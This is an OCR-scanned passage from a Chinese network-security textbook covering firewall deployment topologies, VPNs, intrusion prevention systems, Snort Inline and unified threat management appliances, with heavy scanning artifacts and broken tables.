他 寄宿 在 DMZ 系统 中 的 恶意 软件 。 其 次 ， 内 部 防火 墙 可 以 保护 DMZ 系统 不 受 来 自 内 部 保护 
网 络 的 攻击 。 

3. 多 重 内 部 防火 墙 可 以 用 来 分 别 保护 内 部 网 的 每 个 部 分 不 受 其 他 部 分 的 攻击 ， 图 8-5 
( NISD 传 感 硕 部 署 示例 ) 展示 了 这 样 一 个 网 络 布局 ， 在 这 个 网 络 中 内 部 服务 器 可 以 免 受 来 
自 内 部 工作 站 的 攻击 ; 反 过 来 ， 内 部 工作 站 也 可 以 免 受 来 自 内 部 服务 器 的 攻击 。 该 图 也 
说 明了 将 DMZ 设置 在 外 部 防火 墙 的 不 同 网 络 接口 处 并 以 此 来 访问 内 部 网 络 的 通常 的 实现 
Ee 
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内 部 DMZ 网 络 





服务 器 服务 器 服务 器 


图 9-2 防火 墙 配 置 实例 


95.2 ”虚拟 专用 网 络 


在 今天 的 分 布 式 计算 环境 下 ， 虚 拟 专 用 网 络 ( VPN) 为 网 络 管理 提供 了 一 个 非常 具有 吸引 
力 的 解决 方案 。 本 质 上 讲 , 一 个 VPN 是 这 样 的 一 组 计算 机 : 它们 依靠 一 个 相对 不 安全 的 网 络 
相互 连接 ， 并 利用 加 密 技 术 和 特殊 的 协议 来 提供 安全 性 。 每 个 公司 网 站 、 工 作 站 、 服 务 器 和 
数据 库 都 由 一 个 或 更 多 局 域 网 连接 。 节 点 相互 连接 可 以 用 Internet 或 者 某 些 其 他 公共 网 络 来 实 
现 ， 以 节省 使 用 专用 网 的 费用 ， 同 时 将 管理 广域网 的 任务 转移 给 公共 网 提供 者 。 使 用 公共 网 络 
为 远程 工作 者 和 其 他 移动 职员 提供 了 一 个 从 远程 节点 登录 公司 系统 的 访问 途径 。 

但 是 管理 者 面临 着 一 个 基本 的 需求 ， 那 就 是 安全 。 公 共 网 络 的 使 用 将 公司 的 通信 暴露 在 
可 能 被 罚 听 的 环境 下 ， 并 且 为 非法 用 户 提 供 了 一 个 接 人 上 点。 为 了 解决 这 个 问题 ， 就 需要 一 个 
VPN。 事 实 上 ，VPN 在 底层 协议 上 使 用 加 密 技 术 和 身份 验证 ， 通 过 不 安全 的 网 络 环境 (典型 的 
如 Internet) 建立 了 一 个 安全 的 连接 。VPN 网 络 比 真正 使 用 专用 线路 的 专用 网 更 便宜 ， 但 是 依 
赖 于 信道 两 端 使 用 相同 的 加 密 和 身份 验证 技术 来 实现 。 加 密 技 术 可 能 是 由 防火 墙 软 件 或 者 路 由 
器 来 提供 的 。 为 了 达到 这 个 目的 ， 最 常见 的 协议 机 制 是 在 人 P 层 ， 即 众所周知 的 IPSec 协议 。 

图 9-3 是 一 个 典型 的 IPsec 安全 协议 的 使 用 示例 9。 一 个 机 构 要 维护 多 个 位 置 分 散 的 局 域 


O IPsec 的 详细 内 容 可 参见 第 22 章 。 在 这 一 部 分 的 讨论 中 ， 我 们 需要 了 解 的 是 IPSec 在 卫 包 上 增加 了 一 个 或 
多 个 头 ， 用 以 支持 加 密 和 认证 功能 . 
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网 。 非 安全 IP 流 在 各 个 局 域 网 中 流动 。 对 于 流出 站 点 的 流量 ， 就 需要 穿 过 某 种 专用 或 者 公共 
的 广域网 ， 这 时 就 需要 IPSec 安全 协议 了 。 这 些 协 议 在 网 络 设备 中 工作 ， 比 如 负责 把 局 域 网 连 
回 外 网 的 路 由 器 或 者 防火 墙 。IPSec 的 网 络 设备 会 加 密 和 压缩 所 有 发 送 到 广域网 的 数据 ， 并 且 
解密 、 解 压缩 从 广域网 传人 的 数据 ， 也 可 能 提供 认证 功能 。 这 些 功能 对 局 域 网 上 的 工作 站 和 服 
务 器 是 透明 的 。 安 全 的 传输 对 于 通过 拨号 接 人 广域网 的 个 人 用 户 也 是 可 能 的 。 这 样 的 用 户 工 作 
站 必须 通过 实现 IPSec 协议 来 提供 安全 。 它 们 也 必须 实现 高 级 别 的 主机 安全 ， 就 好 像 它 们 直接 
连接 到 Internet 上 一 样 。 这 使 它们 成 为 试图 进入 公司 网 络 的 入 侵 者 的 很 有 吸引 力 的 目标 。 

实现 IPSec 的 逻辑 方法 是 将 其 设置 在 防火 墙 中 ， 如 图 9-3 中 所 示 。 如 果 IPSec 在 防火 墙 之 
后 (里 面 ) 使 用 ,那么 VPN 数据 流 在 双向 通过 防火 墙 时 都 是 被 加 密 的 。 这 种 情况 下 ， 防 火 墙 
就 不 能 展示 出 它 的 过 滤 功 能 或 其 他 安全 功能 ， 比 如 访问 控制 、 日 志 记 录 或 者 病毒 扫描 。]IPSec 
可 以 在 防火 墙 之 外 的 边界 路 由 器 中 使 用 。 然 而 ， 这 个 设备 似乎 比 防火 墙 更 不 安全 ， 而 且 更 让 人 
难以 对 IPSec 平台 产生 兴趣 。 





具有 IPSec 


图 9-3 一 个 VPN 安全 场景 


95.3 分布 式 防火 墙 


分 布 式 防火 墙 配置 涉及 在 一 个 中 心 管理 员 控 制 下 协同 工作 的 独立 防火 墙 设备 和 基于 主机 的 
防火 墙 。 图 9-4 是 一 个 分 布 式 防火 墙 配置 的 示例 。 管 理 员 可 以 在 数 百 个 服务 器 和 工作 站 上 配置 
驻 留 主 机 的 防火 墙 ， 同 时 在 本 地 和 远程 用 户 系 统 上 配置 个 人 防火 墙 。 许多 工具 允许 网 络 管理 员 
穿 过 整个 网 络 设 定安 全 策略 和 监视 网 络 的 安全 。 这 些 防 火 墙 提供 针对 内 部 攻击 的 保护 ， 也 人 允许 
为 特定 的 机 融和 应 用 程序 提供 特别 定制 的 保护 。 独 立 的 防火 墙 提供 全 局 性 的 保护 ， 包 括 内 部 防 
火 墙 和 外 部 防火 墙 ， 如 同 之 前 所 讨论 的 那样 。 

有 了 分 布 式 防火 墙 ， 就 使 得 同时 建立 内 部 和 外 部 非 军事 区 有 了 了 可能。 那些 由 于 没有 多 少 重 
要 信息 而 不 需要 太 多 保护 的 网 络 服务 器 可 以 被 设置 在 外 部 非 军 事 区 ， 位 于 外 部 防火 墙 外 侧 ， 由 
这 些 服 务 项 上 设置 的 基于 主机 的 防火 墙 提供 必要 的 保护 。 

安全 监控 是 分 布 式 防火 墙 配置 的 一 个 很 重要 的 方面 。 典 型 的 监控 包括 日 志 统 计 和 分 析 、 防 
火 墙 统计 ， 以 及 细 粒 度 (fine-grained) 的 单个 主机 的 远程 监控 (如果 有 需要 的 话 )。 
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954 ”防火 墙 部 署 和 拓扑 结构 小 结 


现在 对 9.4 节 和 9.5 节 的 讨论 作 一 小 结 ， 为 防火 墙 部 轩 和 拓扑 结构 定义 一 个 范围 。 可 选 的 

防火 墙 包括 : 

e 主机 驻 留 防火 墙 ( host-resident firewall); 这 一 类 防火 墙 包括 个 人 防火 墙 软件 和 服务 需 
上 的 防火 墙 软件 ， 无 论 是 物理 的 还 是 虚拟 的 。 这 种 防火 墙 可 以 单独 使 用 ， 也 可 以 作为 
全 面 (in-depth) 防火 墙 的 一 个 部 分 进行 部 署 。 

e 屏蔽 路 由 器 (screening router): 外 部 网 络 与 内 部 网 络 之 间 具 有 无 状态 或 者 全 部 包 过 波 
功能 的 单个 路 由 需 。 这 种 布置 通 稍 适用 于 小 型 办 公 室 / REIMA (Small Office/Home 
Office, SOHO) 应 用 。 

e thw ARES +H (single bastion inline): 位 于 内 部 和 外 部 路 由 需 之 间 的 单个 防火 墙 物 
理 或 虚拟 设备 (例如 ， 图 9-1a)。 这 个 防火 墙 可 以 实现 状态 检测 过 滤 或 者 应 用 程序 代 
理 。 这 是 小 、 中 型 机 构 应 用 的 典型 防火 填 配 置 。 
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图 9-4 分 布 式 防火 墙 配置 实例 


e 独立 T 型 堡垒 主机 (single bastion T): 其 功能 与 独立 内 骸 保 侄 主机 类 似 ， 但 在 独立 T 
型 保 垒 主机 上 有 能 够 连接 到 部 署 着 可 被 外 界 访问 的 服务 需 的 DMZ 的 第 三 方 网 络 接 口 。 
同样 ， 这 是 大 中 型 机 构 中 常用 的 一 种 应 用 配置 结构 。 
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© MARRS +H (double bastion inline); 图 9-2 给 出 了 这 种 配置 ， 在 这 种 结构 中 ，DMZ 
被 夹 在 两 个 保 圣 防火 墙 中 间 。 这 种 配置 通常 在 大 型 商业 机 构 和 政府 机 构 中 使 用 。 

© 双 T 型 堡垒 主机 (double bastion T): 图 8-5 展示 了 这 种 结构 。DMZ 位 于 堡垒 防火 墙 的 
一 个 独立 的 网 络 接口 上 。 这 种 配置 同样 第 见于 大 型 商业 机 构 和 政府 机 构 中 ， 并 且 可 能 
是 被 要 求 使 用 的 。 

© 分布 式 防火 墙 配置 ( distributed firewall configuration): 如 图 9-4 所 示 。 这 种 配置 被 大 型 
商业 机 构 和 政府 部 门 使 用 。 


9.6 ”入侵 防御 系统 


最 近 新 增 的 一 个 安全 产品 是 和信 侵 防御 系统 (IPS)， 也 称 为 人 侵 检 测 防 御 系 统 (IDPS). € 
是 IDS 的 扩展 ， 能 够 尝试 阻止 或 预防 检测 到 的 恶意 活动 。 像 第 8 章 讨论 的 IDS 一 样 ，IPS 也 分 
为 基于 主机 、 基 于 网 络 、 基 于 分 布 式 或 混合 式 这 几 种 类 别 。 同 样 ， 它 也 用 异常 检测 来 识别 非法 
用 户 的 行为 ， 或 者 用 特征 和 局 发 式 检 测 来 识别 已 知 的 恶意 行为 。 

一 旦 IDS 检测 到 恶意 行为 ， 就 可 以 修改 或 者 阻止 进入 外 围 或 者 进入 主机 的 网 络 包 ， 或 者 
修改 或 者 阻止 主机 上 正在 运行 的 程序 所 发 起 的 系统 调用 。 因 此 ， 网 络 IPS 像 防火 墙 一 样 ， 可 以 
阻 断 网 络 流量 ， 但 却 需要 根据 预 设 的 算法 来 决定 后 面 该 干 些 什么 。 网 络 IPS 究竟 是 一 种 独立 的 
新 产品 ， 还 是 防火 墙 的 另外 一 种 形式 ， 这 是 一 个 术语 问题 。 


9.6.1 基于 主机 的 IPS 


基于 主机 的 IPS ( Host-based IPS, HIPS) 能 够 使 用 特征 /启发 式 检测 或 异常 检测 来 识别 
攻击 。 使 用 前 者 的 话 ， 重 点 在 于 从 应 用 程序 网 络 流量 的 内 容 或 系统 调用 的 顺序 之 中 ， 查 找 可 被 
认为 是 恶意 行为 的 特征 。 而 使 用 后 者 的 话 ，IPS 主要 寻找 能 够 表明 某 软件 为 恶意 的 行为 模式 。 
HIPS 中 所 涉及 的 恶意 行为 类 型 的 例子 主要 有 以 下 几 种 : 
© 对 系统 资源 的 修改 (modification of system resource): rootkit、 木 马 和 后 门 程序 是 通过 修 
改 系统 资源 〈 比 如 库 、 目 录 、 注 册 表 设置 和 用 户 账 户 ) 来 运行 的 。 
o 提 权 攻击 (privilege-escalation exploit): 这 种 攻击 试图 授予 普通 用 户 root 访问 权限 。 
e 缓冲 区 溢出 攻击 (buffer-overflow exploit): 这 种 攻击 将 在 第 10 章 中 进行 介绍 。 
e 访问 电子 邮件 通信 录 (access to e-mail contact list): 许多 蠕虫 通过 将 它们 自身 的 拷贝 发 
送 到 本 地 系统 的 电子 邮件 地 址 竹中 的 地 址 的 方式 进行 传播 。 
e 目录 遍历 (directory traversal): 在 Web 服务 器 上 的 目录 遍历 漏洞 ， 人 允许 黑客 访问 服务 
俐 应 用 程序 用 户 正 常 访问 范围 之 外 的 文件 。 
像 这 样 的 攻击 会 引起 可 以 被 HIPS 分 析 的 行为 。HIPS 能 够 为 特定 的 平台 进行 适当 的 定制 。 
可 以 在 台式 系统 或 者 服务 器 系统 中 使 用 一 套 通用 的 工具 。 一 些 HIPS 套装 被 设计 用 来 保护 特定 
种 类 的 服务 器 ， 如 Web 服务 顺和 数据 库 服 务 硕 。 在 这 种 情形 下 ，HIPS 搜寻 特殊 的 应 用 攻击 。 
除了 特征 检测 和 异常 检测 技术 之 外 ，HIPS 还 可 以 使 用 沙 箱 方 法 (sandbox approach )。 沙 箱 
方法 特别 适用 于 移动 代码 ， 比 如 ，Java 小 程序 和 脚本 语言 。HIPS 将 这 些 代码 隔离 在 一 个 独立 
的 系统 区 域内 ， 然 后 运行 它 并 监视 其 行为 。 如 果 受 监视 代码 违反 了 预先 定义 的 策略 或 者 符合 预 
先 定义 的 行为 特征 ， 它 将 被 停止 并 且 禁 止 在 正 浓 系统 环境 中 执行 。 
[ROBB06a] 列 出 了 以 下 典型 的 HIPS 提供 的 桌面 系统 保护 的 范围 : 
e 系统 调用 (system call): 内 核 控 制 着 对 系统 资源 (LOM RAE. VO 设备 和 人 处理 器 ) 的 
访问 。 如 果 要 使 用 这 些 资源 ， 用 户 应 用 程序 需要 调用 对 内 核 的 系统 调用 。 任 何 攻击 代 
码 将 会 执行 至 少 一 个 系统 调用 ，HIPS 可 以 配置 成 检查 每 个 系统 调用 的 恶意 特征 。 
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e 文件 系统 访问 (file system access): HIPS 可 以 确保 文件 访问 系统 调用 是 非 恶 意 的 并 且 

符合 既定 的 安全 策略 。 
© 系统 注册 表 设 置 ( system registry setting): 注册 表 维 护 着 程序 的 日 常 配 置信 息 ， 它 经 常 
被 恶意 地 修改 以 延长 一 次 攻击 的 存活 期 。HIPS 可 以 确保 系统 注册 表 保 持 其 完整 性 。 

© 主机 输入 / 输出 (host input/output): IO 通信 ， 无 论 是 本 地 的 还 是 基于 网 络 的 ， 都 可 以 
传播 攻击 代码 和 恶意 程序 。HIPS 可 以 检测 并 加 强 合法 的 客户 端 与 网 络 的 交互 ， 以 及 客 
户 疾 与 其 他 设备 的 交互 。 

HIPS 的 角色 ”许多 行业 观察 员 注意 到 企业 终端 ， 包 括 昌 面 系统 和 便携 式 电脑 系统 ， 已 经 成 为 
黑客 活动 和 犯罪 的 主要 目标 ， 其 至 超过 了 网 络 设备 [ROBB06b]。 因 此 ， 安 全 设备 提供 商 们 现在 
更 加 重视 终端 安全 产品 的 开发 。 传 统 的 终端 安全 是 由 一 系列 功能 不 同 的 产品 共同 提供 的 ， 比 如 
反 病 毒 软件 、 反 垃圾 邮件 软件 和 个 人 防火 墙 。HIPS 方法 是 试图 由 单一 产品 提供 集成 的 功能 组 的 
一 种 尝试 。 集 成 的 HIPS 方法 的 优点 是 多 种 工具 配合 紧密 ， 威 胁 防护 更 加 广泛 ,管理 也 更 人 简单。 

像 HIPS 这 样 的 终端 安全 产品 ， 如 果 足 够 复杂 ， 就 能 消除 或 者 至 少 减少 对 网 络 层 设备 的 需 
求 ， 这 可 能 是 很 诱 人 的 。 举 个 例子 ， 圣 地 亚 哥 超级 计算 机 中 心 (the San Diego Supercomputer 
Center) 在 报告 中 称 ， 在 不 使 用 防火 墙 而 仅仅 使 用 终端 安全 保护 的 条 件 下 [SING03]， 四 年 多 的 
时 间 内 ， 在 其 所 管理 的 计算 机 上 没有 任何 和 人 侵 。 然 而 ， 更 为 并 慎 的 做 法 是 将 HIPS 作为 涉及 网 
络 层 设 备 ( 例 如， 防火 墙 或 者 基于 网 络 的 IPS) 的 一 整套 策略 中 的 一 个 组 件 使 用 。 


96.2 基于 网 络 的 IPS 


一 个 基于 网 络 的 IPS ( Network-based IPS, NIPS) 实质 上 是 一 个 具有 修改 或 丢弃 数据 包 和 
FF TCP 连接 权限 的 内 做 NIDS (基于 网 络 的 人 侵 检测 系统 )。 和 NIDS 一 样 ，NIPS 使 用 诸如 
特征 /启发 式 检 测 和 异常 检测 之 类 的 技术 。 

在 所 有 NIPS 中 使 用 但 是 在 防火 墙 中 并 不 常见 的 技术 是 流 数据 的 保护 。 这 种 技术 要 求 对 一 
个 数据 包 序 列 中 的 应 用 净 荷 进行 重组 。 每 当 数 据 流 中 的 一 个 新 包 到 达 时 ，IPS 设备 对 流 的 全 部 
内 容 进 行 过 滤 。 当 一 个 数据 流 被 确定 为 恶意 时 ， 最 后 到 达 以 及 所 有 属于 可 疑 数据 流 的 后 续 数 据 
包 都 会 被 丢弃 。 

按照 NIPS 设备 使 用 的 识别 恶意 数据 包 的 常用 方法 中 ， 以 下 几 种 都 较为 典型 . 

e 模式 匹配 (pattern matching): 扫描 进入 的 数据 包 ， 和 寻找 数 据 库 中 已 知 攻击 的 特定 的 字 

节 序 列 ( 即 代码 特征 )。 

e 状态 匹配 (stateful matching): 在 一 个 上 下 文 相关 的 传输 流 中 扫描 攻击 特征 码 ， 而 不 是 
在 各 个 数据 包 中 查找 。 
协议 异常 (protocol anomaly): 按照 RFC 中 提 及 的 标准 陈述 寻找 偶 差 。 
传输 异常 ( traffic anomaly): 寻找 不 寻常 的 传输 活动 ， 例 如 一 个 UDP 数据 包 洪 泛 流 或 
者 网 络 中 出 现 的 一 个 新 设备 。 

© 统计 异常 (statistical anomaly): 开发 一 些 正常 传输 活动 和 吞吐 量 的 基线 ， 并 且 在 与 基线 

发 生 偏离 时 进行 报 殴 。 
96.3 分布 式 或 混合 式 IPS 

最 后 一 类 IPS 采用 了 分 布 式 或 混合 式 方法 。 它 的 做 法 是 收集 大 量 基于 主机 和 基于 网 络 的 传 

感 器 数据 ， 将 其 传送 到 中 央 处 理 系 统 。 而 中 央 处 理 系统 能 够 对 这 些 数据 进行 关联 分 析 ， 并 更 新 


特征 和 行为 模式 ， 从 而 使 得 所 有 的 协作 系统 可 以 应 对 和 防御 恶意 行为 。 目 前 已 经 提出 了 和 若干 这 
样 的 系统 ， 其 中 最 为 著名 的 就 是 数字 免疫 系统 (digital immune system). 
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数字 免疫 系统 数字 免疫 系统 是 IBM 研发 的 一 套 全 面 防 御 系 统 ， 可 以 抵御 由 恶意 软 
件 引 发 的 恶意 行为 [KEPH97a、KEPH97b、WHIT99]， 该 系统 随后 由 Symantec 进行 了 完善 
[SYMA01]， 还 并 入 了 它 的 中 央 隅 离 产 品 (central quarantine produce) [SYMA05]。 它 的 开发 动 
机 主要 有 基于 网 络 的 恶意 软件 的 威胁 、 由 Internet 所 带 来 的 不 断 增长 的 传播 速度 以 及 对 该 情形 
全 面 掌控 的 需求 。 

为 了 应 对 由 Internet 长 足 发 展 所 带 来 的 威胁 ，IBM 研发 了 数字 免疫 系统 的 原型 。 该 系统 扩 
ET 6.10 节 中 讨论 的 沙 箱 分 析 的 使 用 ， 并 提供 了 通用 仿真 和 恶意 软件 检测 系统 。 该 系统 的 目 
标 是 ， 一 且 发 现 恶意 软件 ， 立 即 给 出 一 个 快速 的 啊 应 ， 以 便 将 其 清除 。 当 一 个 新 的 恶意 软件 进 
人 某 机 构 时 ， 免 疫 系统 能 目 动 地 捕获 、 分 析 并 为 它 增加 防范 措施 ， 移 除 它 ， 并 将 相关 信息 发 送 
到 客户 系统 ， 进 而 使 恶意 软件 在 其 他 地 方 运行 之 前 就 被 检测 到 。 

数字 免疫 系统 能 否 成 功 主要 取决 于 恶意 软件 分 析 系 统 检 测 新 的 恶意 软件 的 能 力 。 通 过 对 网 
络 上 新 发 现 的 恶意 软件 进行 实时 分 析 和 监测 ， 系 统 可 以 持续 对 免疫 软件 进行 更 新 ， 以 跟 上 威胁 
的 发 展 步 伐 。 

图 9-5 展示 了 一 个 最 初 被 设计 用 来 检测 蠕虫 的 混合 式 架 构 的 例子 [SIDI05]。 该 系统 以 下 列 
方式 工作 (图 中 的 数字 指 的 是 以 下 列 的 编号 )。 

1. 在 不 同 的 网 络 和 主机 位 置 部 署 传 感 费 用 于 检测 潜在 的 恶意 软件 扫描 、 注 人 或 执行 。 传 感 
器 逻辑 也 可 以 和 IDS 传感器 协作 。 

2. 传感器 给 中 央 服 务 器 发 送 警 报 和 检测 到 的 恶意 软件 副本 ， 中 央 服 务 器 会 关联 和 分 析 这 些 
信息 。 关 联 服务 器 能 够 确定 被 检测 到 的 软件 为 恶意 软件 的 可 能 性 及 其 关键 特征 。 

3. 服务 器 将 信息 发 送 到 一 个 受 控 环 境 中 ， 在 这 里 潜在 的 恶意 软件 被 放 人 沙 盒 中 进行 分 析 和 测试 。 

4. 受 保护 的 系统 根据 目标 应 用 程序 的 一 个 适当 检测 版 本 来 测试 可 疑 软 件 ， 以 确认 漏洞 。 

5. 受 保护 的 系统 生成 一 个 或 多 个 软件 补丁 并 测试 它们 。 

6. 如 果 补 丁 不 会 受到 注入 影响 ， 且 不 会 损坏 应 用 程序 的 功能 ， 那 么 系统 会 给 应 用 程序 所 在 
主机 发 送 补 丁 进行 更 新 。 





图 9-5 恶意 软件 监控 系统 的 布置 


RR: 基于 [SIDI05]。Sidiroglou, S., and Keromytis, A. “ Countering Network Worms Through Automatic Patch 
Generation. " , Columbia University, Figure 1, page 3,November-December 2005. http://www1.cs.columbia. 


edu/~angelos/Papers/2005/j6ker3.pdf IEEE. 
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9.6.4 Snort Inline 


Snort 是 一 种 轻 量 级 的 入 侵 检 测 系统 ， 我 们 在 8.9 节 中 进行 了 介绍 。Snort Inline[KURU12] 
是 Snort 的 改进 版 ， 它 增强 了 Snort 作为 人 侵 防 御 系 统 的 功能 。Snort Inline 中 加 入 了 3 种 新 的 
规则 来 提供 入 侵 防御 功能 : 
e EF (drop): Snort 依据 规则 中 定义 的 规则 拒绝 数据 包 ， 并 将 结果 记录 下 来 。 
o 拒绝 (reject): Snort 拒绝 一 个 数据 包 并 且 记 录 结 果 。 另 外 ， 还 返回 一 个 错误 消息 。 如 
RETO 包 ， 这 个 消息 是 一 个 TCP 复位 消息 ， 它 重 置 这 个 TCP 连接。 如果 是 UDP 
包 ， 一 个 ICMP 端口 不 可 到 达 消 息 会 被 发 送 到 UDP 包 的 发 起 人 。 
e 简单 丢弃 (Sdrop): Snort 拒绝 一 个 数据 包 ， 但 是 并 不 记录 它 。 
Snort Inline 包含 一 个 可 替换 的 选项 ， 此 选项 允许 Snort 的 用 户 修改 数据 包 而 不 是 丢弃 它 
们 。 这 个 特点 对 蜜 钢 系统 的 实现 很 有 帮助 [SPIT03]。 蜜 钢 系 统 是 通过 修改 数据 包 的 内 容 使 攻击 
失去 效力 ， 而 不 是 阻止 检测 到 的 攻击 。 攻 击 者 发 送 他 们 的 人 侵 程序 ， 使 之 通过 Internet 攻击 他 们 
想 要 攻击 的 目标 ， 但 是 Snort Inline 可 以 让 这 些 攻击 失效 ， 最 终 失 败 。 攻 击 者 可 以 发 觉 失 败 但 是 
摘 不 清 为 什么 会 失败 。 蜜 缸 系统 则 可 以 在 降低 危害 远程 系统 的 风险 的 同时 ， 继 续 监 视 攻 击 者 。 


97 实例: 一 体 化 威胁 管理 产品 


在 前 面 几 章 里 ， 我 们 回顾 了 一 些 对抗 恶 意 软件 和 基于 网 络 的 攻击 的 方法 ， 包 括 一 些 反 病 毒 
和 反 蠕虫 产品 、IPS MIDS 以 及 防火 墙 。 这 些 系统 的 实现 可 以 提供 一 个 利用 多 层 过 滤 和 防御 机 
制 来 阻止 攻击 的 全 面 深 入 的 防御 体系 。 这 种 分 步 实 现 的 消极 方面 表现 在 ， 需 要 配置 、 部 署 和 管 
理 一 系列 的 设备 和 软件 包 等 。 另 外 ， 顺 序 地 部 署 一 定数 量 的 设备 可 能 会 降低 原 有 的 性 能 。 

一 种 降低 管理 和 实施 负担 的 方法 是 ， 用 一 个 单一 的 集成 了 多 种 对 抗 基于 网 络 的 攻击 方法 的 
设备 来 代替 所 有 的 内 艇 网 络 安全 产品 (如 防火 墙 、IPS、IDS、VPN、 反 蠕虫 和 反 间 谍 程 序 ， 等 
等 )。 市 场 分 析 机 构 IDC 将 这 种 设备 称 为 一 体 化 威胁 管理 (Unified Threat Management, UTM) 
系统 ， 并 对 UTM 给 出 了 如 下 定义 :“ 将 多 种 安全 特 
性 集成 在 一 个 盒子 里 的 产品 。 包 含 在 其 中 的 设备 ， 必 
须 能 够 实现 网 络 防火 墙 、 网 络 人 侵 检 测 和 防护 ， 以 及 
反 病 毒 网 关 的 功能 。 设 备 的 全 部 功能 不 一 定 要 同时 使 | 
用 ， 但 必须 固有 地 存在 于 该 设备 中 。 

关于 UTM 的 一 个 争论 焦点 是 其 性 能 ， 其 中 否 吐 
量 和 延迟 是 两 个 重要 的 性 能 指标 。[MESS06] 报告 中 
称 ， 现 有 商业 设备 普 凯 的 吞吐 量 损 失 是 50%。 因 此 ， 
客户 们 被 建议 去 使 用 高 性 能 、 大 吞吐 量 的 设备 以 将 这 
种 明显 的 性 能 劣势 降 到 最 低 。 

图 9-6 是 一 个 典型 的 UTM 设备 的 体系 结构 。 以 


未 被 处 理 的 到 达 流 量 


LESVE, JURE ee 
解密 。 如 果 设备 具有 VPN 边界 节点 的 功能 ， 那 么 这 Le 
里 需要 进行 IPSec 解密 。 Re : 

2 .第 一 道 防火 墙 模块 过 滤 网 络 流量 ， 丢 弃 那 些 违 7 
反 规 则 的 数据 包 ， 或 允许 那些 符合 防火 墙 策 略 中 的 规 图 9-6 一 体 化 威胁 处 理 设 备 


则 集 的 数据 包 通 过 。 来 源 : 基于 [JAME06] 
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3. 除了 这 一 点 ， 寿 干 模块 用 来 在 多 种 协议 层面 处 理 个 人 数据 包 和 数据 包 流 。 在 这 种 特定 的 
配置 中 ， 数 据 分 析 引 擎 负责 跟踪 数据 包 流 和 协调 反 病 毒 、IDS 和 IPS 引擎 的 工作 。 

4. 数据 分 析 引 擎 还 将 多 包 ( multipacket) TESHA, AAAA, Web 过 滤 
器 和 反 垃 圾 邮件 模块 进行 内 容 分 析 。 

5. 一 些 入 站 的 网 络 流量 可 能 需要 被 由 次 加 密 以 维护 企业 内 部 网 络 数据 流 的 安全 。 

6. 所 有 检测 到 的 威胁 都 被 报告 给 日 志 模 块 和 报告 模块 ， 用 于 在 指定 情况 下 发 出 警报 ， 以 及 
网 络 取证 分 析 。 

7. 带宽 定型 (bandwidth-shaping) 模块 可 以 使 用 多 种 优先 权 和 服务 质量 (QoS) 算法 来 优化 性 能 。 

作为 UTM 设备 应 用 领域 的 一 个 例子 ， 表 9-3 和 表 9-4 列 出 了 Secure Computing 推 向 市 场 
的 UTM 设备 能 够 对 抗 的 部 分 攻击 。 


表 9-3 Sidewinder G2 安全 设备 攻击 防护 摘要 一 一 传输 层 举例 


攻击 以 及 Internet 威胁 防护 措施 


dese a @ 强制 使 用 正确 TCP 标记 
@ 强制 使 用 TCP 消息 头 长 度 
a © 确保 正确 的 3 次 握手 
a @ 正确 地 关闭 TCP 会 话 
© 将 会 话 分 为 内 部 会 话 和 外 部 会 话 两 段 
“ o 强制 使 用 正确 的 TCP 标记 法 
e 管理 TCP 会 话 超时 
TCP © 随机 数据 作为 TCP a re a 
e 头 部 
o 重组 数据 包 确 保 正 确 性 
a eai oe o 适当 处 理 TCP 超时 和 重 传 计时 器 
. pe @ 所 有 TCP 代理 都 受到 保护 
cet ER EO o 通过 访问 列表 进行 传输 控制 
@ A Fuck @ 在 未 打开 的 端口 处 丢弃 TCP 包 
@ 代理 阻止 分 组 骗术 
@ 分 组 骗术 : 利用 不 同 的 TCP 选项 集 
无 效 的 UDP 包 
HOP 利用 随机 UDP 数据 以 绕 开 规则 9 验证 正确 的 UDP 包 
连接 预测 o 在 未 打开 的 端口 处 丢弃 UDP 包 


UDP 端口 扫描 





表 9-4 Sidewinder G2 安全 设备 攻击 防护 摘要 一 一 应 用 层 举 例 


攻击 和 Internet 威胁 保护 措施 


对 AAAA 查询 错误 的 NXDOMAIN 响应 可 能 | @。 不 允许 负 缓 存 (negative caching) 
引起 拒绝 服务 条 件 e 防止 DNS 缓存 中 毒 


ISC BIND 9 在 9.2.1 之 前 的 版 本 允许 远程 攻击 
者 用 一 个 有 缺陷 的 DNS 包 来 引起 一 次 拒绝 服务 
(关机 )。 该 包 触发 一 个 错误 条 件 ， 即 当 message.c 
中 的 dns message findtype() 函数 中 的 rdataset 参 
数 不 为 NULL 时 ， 该 包 不 能 被 正确 处 理 







e 错误 形成 的 DNS 消息 会 影响 防火 墙 的 运行 ， 
Sidewinder G2 可 以 防止 这 样 的 恶意 使 用 

DNS @ 防止 DNS 查询 攻击 

e 防止 DNS 应 答 攻击 

预防 区 域 传输 和 区 域 查询 

真正 的 基于 Type Enforcement 技术 的 DNS 分 割 保 

护 , 将 DNS 划分 为 公共 DNS 区 域 和 专用 DNS 区 域 

关闭 递归 的 能 力 


DNS 信息 阻碍 以 及 其 他 DNS 滥用 





攻击 和 Internet 威胁 


@ FIP 反弹 攻击 


@ 
ap PASS 攻击 


@ FIP 端口 注入 攻击 
@ TCP 分 段 攻击 


SQL SQL 网 络 中 间 人 攻击 


实时 流 协 | @ 
议 (RTSP) | © 


缓冲 区 洪 出 
拒绝 服务 







SNMP 洪 泛 攻击 
默认 团体 攻击 
RABE 
SNMP 攻击 


挑战 - 应 答 缓冲 区 溢出 

SSHD 人 允许 用 户 覆 盖 “ Allowed Authenticati- 
on” 位 

OpenSSH buffer append space 缓冲 区 溢出 
OpenSSH/PAM 挑战 — 应答 缓冲 区 洲 出 
OpenSSH 信道 代码 offer-by-one 


Sendmail 缓冲 区 溢出 
Sendmail 拒绝 服务 攻击 
Sendmail 的 远程 缓冲 区 溢出 
Sendmail 地 址 解析 缓冲 区 溢出 
SMTP 协议 异常 


SNMP 






SSH 






SMTP 蠕虫 攻击 
SMTP 邮件 洪 泛 攻击 
中 继 攻 击 


SMTP 


Wate. AS. e 
电子 邮件 地 址 欺骗 
MIME 攻击 

网 络 钓鱼 电子 邮件 


广告 软件 用 于 收集 与 营销 相关 的 信息 
掩护 马 


间谍 软件 特洛伊 木马 


恶意 软件 
后 门 圣 诞 老 人 


98 关键 术语 、 复 习题 和 习题 
关键 术语 


application-level gateway (应 用 级 网 关 ) 
bastion host (EHL) 
circuit-level gateway (电路 级 网 关 ) 
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( 续 ) 
保护 措施 


Sidewinder G2 可 以 过 滤 FTP 命令 以 阻止 这 些 攻击 
真正 的 网 络 隔离 阻止 分 段 攻击 


受 Type Enforcement 技术 保护 的 智能 代理 
经 过 非 透明 连接 隐藏 内 部 DB 


受 Type Enforcement 技术 保护 的 智能 代理 

协议 验证 

拒绝 多 播 流 量 

